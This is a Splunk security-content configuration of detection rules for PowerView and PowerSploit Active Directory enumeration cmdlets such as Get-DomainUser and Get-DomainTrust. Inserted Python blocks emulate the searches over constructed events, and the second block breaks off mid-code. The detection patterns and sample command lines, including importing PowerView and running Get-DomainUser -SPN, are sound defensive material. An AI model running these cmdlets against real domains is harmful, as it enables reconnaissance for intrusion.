action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` running the `Get-DomainPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.notable.param.rule_title = Get DomainPolicy with Powershell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainpolicy_with_powershell_filter`

[ESCU - Get DomainPolicy with Powershell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainPolicy` cmdlet, which is used to obtain the password policy of a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainPolicy with Powershell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = powershell process having commandline $ScriptBlockText$ to query domain policy. 
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainPolicy with Powershell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. 
action.notable.param.rule_title = Get DomainPolicy with Powershell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText ="*Get-DomainPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainpolicy_with_powershell_script_block_filter` [ESCU - Get-DomainTrust with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
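The Script Block stanzas in this section (Get-DomainPolicy, Get-DomainTrust, Get-DomainUser and Get-ForestTrust) all share one shape: filter to EventCode=4104, wildcard-match ScriptBlockText, then `stats ... by Computer UserID`. The example below is added here and is not ESCU content; it emulates that logic in Python over constructed 4104 events so the behaviour can be checked offline. One thing the SPL does not do, and that a practitioner should know about, is reassembly: Windows writes a long script block as several 4104 events that share a ScriptBlockId and are numbered MessageNumber of MessageTotal, so a per-event substring match misses a cmdlet name that straddles a fragment boundary. The field names are the real EventData fields of a 4104 event; the events, hosts and SIDs are constructed.

```python
"""Emulation of the ESCU 4104 script-block detections (added example, not ESCU code)."""
from collections import defaultdict
from datetime import datetime, timezone

# Substring patterns from the Script Block stanzas in this section, with the
# ATT&CK technique each stanza maps to. Matching is case-insensitive, which is
# what the page's "*Get-DomainPolicy*" / "*get-domaintrust*" wildcards intend.
PATTERNS = {
    "Get-DomainPolicy": "T1201",
    "Get-DomainTrust": "T1482",
    "Get-DomainUser": "T1087.002",
    "Get-ForestTrust": "T1482",
}

def _ts(s):
    """Parse the constructed ISO-8601 timestamps used in the samples."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

# Constructed sample events (not real telemetry). Block "b7" is a long script
# block that Windows wrote as two 4104 events; the cmdlet name "Get-DomainUser"
# straddles the fragment boundary.
SAMPLE_4104 = [
    {"_time": "2024-04-17T10:00:01Z", "EventCode": 4104, "Computer": "ws01.corp.local",
     "UserID": "S-1-5-21-1-2-3-1001", "ScriptBlockId": "a1", "MessageNumber": 1,
     "MessageTotal": 1, "ScriptBlockText": "Get-DomainPolicy -Domain corp.local"},
    {"_time": "2024-04-17T10:00:05Z", "EventCode": 4104, "Computer": "ws01.corp.local",
     "UserID": "S-1-5-21-1-2-3-1001", "ScriptBlockId": "a2", "MessageNumber": 1,
     "MessageTotal": 1, "ScriptBlockText": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"_time": "2024-04-17T10:01:00Z", "EventCode": 4104, "Computer": "srv02.corp.local",
     "UserID": "S-1-5-21-1-2-3-500", "ScriptBlockId": "b7", "MessageNumber": 1,
     "MessageTotal": 2, "ScriptBlockText": "Import-Module .\\PowerView.ps1; Get-Domain"},
    {"_time": "2024-04-17T10:01:00Z", "EventCode": 4104, "Computer": "srv02.corp.local",
     "UserID": "S-1-5-21-1-2-3-500", "ScriptBlockId": "b7", "MessageNumber": 2,
     "MessageTotal": 2, "ScriptBlockText": "User -SPN | Select-Object samaccountname"},
    {"_time": "2024-04-17T10:03:30Z", "EventCode": 4104, "Computer": "srv02.corp.local",
     "UserID": "S-1-5-21-1-2-3-500", "ScriptBlockId": "c3", "MessageNumber": 1,
     "MessageTotal": 1, "ScriptBlockText": "get-domaintrust | ft"},
    # A 4103 (module logging) event carries Payload, not ScriptBlockText, and is
    # excluded by the EventCode=4104 filter just as in the SPL.
    {"_time": "2024-04-17T10:04:00Z", "EventCode": 4103, "Computer": "srv02.corp.local",
     "UserID": "S-1-5-21-1-2-3-500", "Payload": "CommandInvocation(Get-DomainTrust)"},
]

def reassemble(events):
    """Join the fragments of each script block (same Computer, UserID and
    ScriptBlockId, ordered by MessageNumber) into one record. A per-event
    substring match, which is what ScriptBlockText="*Get-DomainUser*" does,
    misses a cmdlet name that is split across two fragments."""
    frags = defaultdict(list)
    for ev in events:
        if ev.get("EventCode") != 4104:
            continue
        frags[(ev["Computer"], ev["UserID"], ev["ScriptBlockId"])].append(ev)
    blocks = []
    for (computer, user, sbid), parts in frags.items():
        parts.sort(key=lambda e: e["MessageNumber"])
        times = [_ts(p["_time"]) for p in parts]
        blocks.append({
            "Computer": computer, "UserID": user, "ScriptBlockId": sbid,
            "ScriptBlockText": "".join(p["ScriptBlockText"] for p in parts),
            "complete": len(parts) == parts[0]["MessageTotal"],
            "firstTime": min(times), "lastTime": max(times),
        })
    return blocks

def detect(events, patterns=PATTERNS):
    """Equivalent of the page's search shape
       `powershell` EventCode=4104 ScriptBlockText="*<cmdlet>*"
       | stats count min(_time) as firstTime max(_time) as lastTime by Computer UserID ...
       | rename Computer as dest, UserID as user
    run on reassembled blocks. Returns one row per (dest, user, cmdlet)."""
    rows = {}
    for blk in reassemble(events):
        text = blk["ScriptBlockText"].lower()
        for cmdlet, technique in patterns.items():
            if cmdlet.lower() not in text:
                continue
            row = rows.setdefault((blk["Computer"], blk["UserID"], cmdlet), {
                "dest": blk["Computer"], "user": blk["UserID"], "cmdlet": cmdlet,
                "mitre_attack": technique, "count": 0,
                "firstTime": blk["firstTime"], "lastTime": blk["lastTime"], "blocks": []})
            row["count"] += 1
            row["firstTime"] = min(row["firstTime"], blk["firstTime"])
            row["lastTime"] = max(row["lastTime"], blk["lastTime"])
            row["blocks"].append(blk["ScriptBlockText"])
    return sorted(rows.values(), key=lambda r: (r["dest"], r["user"], r["cmdlet"]))

def per_event_hits(events, cmdlet):
    """The naive per-event match, for comparison with detect()."""
    return [e for e in events if e.get("EventCode") == 4104
            and cmdlet.lower() in e["ScriptBlockText"].lower()]

if __name__ == "__main__":
    for r in detect(SAMPLE_4104):
        print(f'{r["dest"]} {r["user"]} {r["cmdlet"]} ({r["mitre_attack"]}) count={r["count"]} '
              f'first={r["firstTime"].isoformat()} last={r["lastTime"].isoformat()}')
    print("per-event hits for Get-DomainUser:", len(per_event_hits(SAMPLE_4104, "Get-DomainUser")))
```

Running it produces three rows (Get-DomainTrust and Get-DomainUser on srv02, Get-DomainPolicy on ws01) while the per-event match for Get-DomainUser returns nothing, which is exactly the gap the reassembly closes. In Splunk the same join can be done with `stats list(ScriptBlockText) by ScriptBlockId` before matching, at the cost of a non-streaming search.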
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives as this requires an active Administrator or adversary to bring in, import, and execute. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-DomainTrust with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-DomainTrust was identified on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-DomainTrust with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. 
action.notable.param.rule_title = Get-DomainTrust with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*get-domaintrust* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_filter` [ESCU - Get-DomainTrust with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. 
Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = It is possible certain system management frameworks utilize this command to gather trust information. action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-DomainTrust with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-DomainTrust was identified on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-DomainTrust with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-DomainTrust from PowerView in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. 
action.notable.param.rule_title = Get-DomainTrust with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-domaintrust*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domaintrust_with_powershell_script_block_filter` [ESCU - Get DomainUser with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainUser with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainUser with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": 
["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may leverage PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainUser with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-DomainUser*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainuser_with_powershell_filter` [ESCU - Get DomainUser with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet. `GetDomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet. `GetDomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get DomainUser with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Powershell process having commandline "*Get-DomainUser*" for user enumeration on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get DomainUser with PowerShell Script Block 
- Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` cmdlet. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows domains. Red Teams and adversaries alike may use PowerView to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get DomainUser with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Get-DomainUser*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_domainuser_with_powershell_script_block_filter` [ESCU - Get-ForestTrust with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. 
It will be important to understand the timeline of events around this activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives as this requires an active Administrator or adversary to bring in, import, and execute. 
action.escu.creation_date = 2021-09-02 action.escu.modification_date = 2021-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Get-ForestTrust with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Suspicious PowerShell Get-ForestTrust was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get-ForestTrust with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. Typically, this is utilized within a script being executed and used to enumerate the domain trust information. This grants the adversary an understanding of how large or small the domain is. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. 
action.notable.param.rule_title = Get-ForestTrust with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe) Processes.process=*get-foresttrust* by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_foresttrust_with_powershell_filter` [ESCU - Get-ForestTrust with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies Get-ForestTrust from PowerSploit in order to gather domain trust information. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1482", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. 
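The process-based stanzas in this section (Get-DomainPolicy, Get-DomainTrust, Get-DomainUser and Get-ForestTrust with PowerShell) are one detector with four parameters: a host-process filter on `Processes.process_name`, a wildcard on `Processes.process`, and a risk score and ATT&CK technique per cmdlet. The example below is added here and is not ESCU content; it emulates that generalized tstats logic in Python over constructed CIM `Endpoint.Processes` rows, then rolls findings up per risk object the way the `action.risk.param._risk` user and dest objects accumulate. Two assumptions are labelled in the code: `pwsh.exe` (PowerShell 7) is added to the host-process list because neither `powershell*` nor `powershell.exe` on the page matches it, and a `dest_allowlist` stands in for the trailing `get_<name>_with_powershell_filter` macro, assumed to be the local tuning hook. Hosts, users and command lines are constructed.

```python
"""Emulation of the Endpoint.Processes (tstats) detections in this section
(added example, not ESCU code)."""
from collections import defaultdict
from datetime import datetime, timezone

# Per-cmdlet settings taken from the process-based stanzas in this section:
# risk_score from action.risk.param._risk, technique from mitre_attack.
RULES = {
    "Get-DomainPolicy": {"risk_score": 30, "mitre_attack": "T1201"},
    "Get-DomainTrust":  {"risk_score": 12, "mitre_attack": "T1482"},
    "Get-DomainUser":   {"risk_score": 25, "mitre_attack": "T1087.002"},
    "Get-ForestTrust":  {"risk_score": 12, "mitre_attack": "T1482"},
}

# The stanzas restrict process_name to cmd.exe and powershell.exe / powershell*.
# pwsh.exe (PowerShell 7) is an assumption added here: neither page pattern
# matches it, so a PowerView run under pwsh would be missed as written.
HOST_PROCESSES = frozenset({"cmd.exe", "powershell.exe", "powershell_ise.exe", "pwsh.exe"})

def _ts(s):
    """Parse the constructed ISO-8601 timestamps used in the samples."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

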